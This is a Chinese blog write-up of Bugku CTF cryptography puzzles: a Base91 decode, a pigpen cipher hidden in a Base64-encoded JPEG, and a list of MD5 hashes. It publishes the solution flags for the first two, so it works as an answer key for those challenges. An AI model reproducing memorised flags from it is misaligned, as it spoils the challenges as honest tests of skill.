bugku合集2

原创 已于 2025-10-26 19:57:02 修改 · 678 阅读 · 20 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全 #密码学

于 2025-10-26 19:55:35 首次发布

hello,同志们好!^owo^

今天继~续~bugku~

1,贝斯家族

ok啊密文为:@iH<,{bdR2H;i6*Tm,Wx2izpx2!

直接随波逐流,得出是base91(细节91【狗头】)

Base91 是一种二进制到文本的编码方法,由 Joachim Henke 在 2005 年设计。它的主要目标是提供比 Base64 更高的编码密度,同时保持使用可打印的 ASCII 字符。

设计原理

Base91 的核心思想是:

  • 使用 91 个可打印 ASCII 字符(因此叫 Base91)

  • 这些字符的 ASCII 值从 33 到 126,排除了一些可能引起问题的字符

  • 比 Base64(64 个字符)使用更多的字符,因此编码效率更高

Base91 字符集

标准的 Base91 使用以下 91 个字符:ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!#$%&()*+,./:;<=>?@[]^_`{|}~"

排除了以下字符:

  • 空格(32)

  • 单引号 '(39)

  • 反斜线 \(92)

  • 其他控制字符

最后得出flag为flag{554a5058c9021c76}

2,把猪困在猪圈里

打开附件:

/9j/4AAQSkZJRgABAQEAYABgAAD/4RDaRXhpZgAATU0AKgAAAAgABAE7AAIAAAAFAAAISodpAAQAAAABAAAIUJydAAEAAAAKAAAQyOocAAcAAAgMAAAAPgAAAAAc6gAAAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFIwMFQAAAAFkAMAAgAAABQAABCekAQAAgAAABQAABCykpEAAgAAAAM0MQAAkpIAAgAAAAM0MQAA6hwABwAACAwAAAiSAAAAABzqAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMjAyMTowMToxMCAyMjo0MDo1OQAyMDIxOjAxOjEwIDIyOjQwOjU5AAAAUgAwADAAVAAAAP/hCxdodHRwOi8vbnMuYWRvYmUuY29tL3hhcC8xLjAvADw/eHBhY2tldCBiZWdpbj0n77u/JyBpZD0nVzVNME1wQ2VoaUh6cmVTek5UY3prYzlkJz8+DQo8eDp4bXBtZXRhIHhtbG5zOng9ImFkb2JlOm5zOm1ldGEvIj48cmRmOlJERiB4bWxuczpyZGY9Imh0dHA6Ly93d3cudzMub3JnLzE5OTkvMDIvMjItcmRmLXN5bnRheC1ucyMiPjxyZGY6RGVzY3JpcHRpb24gcmRmOmFib3V0PSJ1dWlkOmZhZjViZGQ1LWJhM2QtMTFkYS1hZDMxLWQzM2Q3NTE4MmYxYiIgeG1sbnM6ZGM9Imh0dHA6Ly9wdXJsLm9yZy9kYy9lbGVtZW50cy8xLjEvIi8+PHJkZjpEZXNjcmlwdGlvbiByZGY6YWJvdXQ9InV1aWQ6ZmFmNWJkZDUtYmEzZC0xMWRhLWFkMzEtZDMzZDc1MTgyZjFiIiB4bWxuczp4bXA9Imh0dHA6Ly9ucy5hZG9iZS5jb20veGFwLzEuMC8iPjx4bXA6Q3JlYXRlRGF0ZT4yMDIxLTAxLTEwVDIyOjQwOjU5LjQxMTwveG1wOkNyZWF0ZURhdGU+PC9yZGY6RGVzY3JpcHRpb24+PHJkZjpEZXNjcmlwdGlvbiByZGY6YWJvdXQ9InV1aWQ6ZmFmNWJkZDUtYmEzZC0xMWRhLWFkMzEtZDMzZDc1MTgyZjFiIiB4bWxuczpkYz0iaHR0cDovL3B1cmwub3JnL2RjL2VsZW1lbnRzLzEuMS8iPjxkYzpjcmVhdG9yPjxyZGY6U2VxIHhtbG5zOnJkZj0iaHR0cDovL3d3dy53My5vcmcvMTk5OS8wMi8yMi1yZGYtc3ludGF4LW5zIyI+PHJkZjpsaT5SMDBUPC9yZGY6bGk+PC9yZGY6U2VxPg0KCQkJPC9kYzpjcmVhdG9yPjwvcmRmOkRlc2NyaXB0aW9uPjwvcmRmOlJERj48L3g6eG1wbWV0YT4NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgICAgICAgICAgICAgPD94cGFja2V0IGVuZD0ndyc/Pv/bAEMABwUFBgUEBwYFBggHBwgKEQsK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

我们根据开头的/9j知道这是一张图片经过base64后的密文

所以用随波逐流将base64再转换成图片,得到:

这是猪圈密码,猪圈密码是一种单表替换密码,它使用图形符号而不是字母来对信息进行加密。它的核心在于将26个字母分配到特定的网格位置中,然后用该位置对应的“围栏”图形来代表字母。

flag为flag{thisispigpassword}

3,easy_hash

打开附件:

分别给了我们一个吗密文,和加密脚本(没啥用)

密文为:

8fa14cdd754f91cc6554c9e71929cce7
2db95e8e1a9267b7a1188556b2013b33
0cc175b9c0f1b6a831c399e269772661
b2f5ff47436671b6e533d8dc3614845d
f95b70fdc3088560732a5ac135644506
61e9c06ea9a85a5088a499df6458d276
e1671797c52e15f763380b45e841ec32
c4ca4238a0b923820dcc509a6f75849b
4a8a08f09d37b73795649038408b5f33
cfcd208495d565ef66e7dff9f98764da
6f8f57715090da2632453988d9a1501b
e1671797c52e15f763380b45e841ec32
b14a7b8059d9c055954c92674ce60032
e358efa489f58062f10dd7316b65649e
cfcd208495d565ef66e7dff9f98764da
b14a7b8059d9c055954c92674ce60032
e358efa489f58062f10dd7316b65649e
2510c39011c5be704182423e3a695e91
e1671797c52e15f763380b45e841ec32
b14a7b8059d9c055954c92674ce60032
f1290186a5d0b1ceab27f4e77c0c5d68
cfcd208495d565ef66e7dff9f98764da
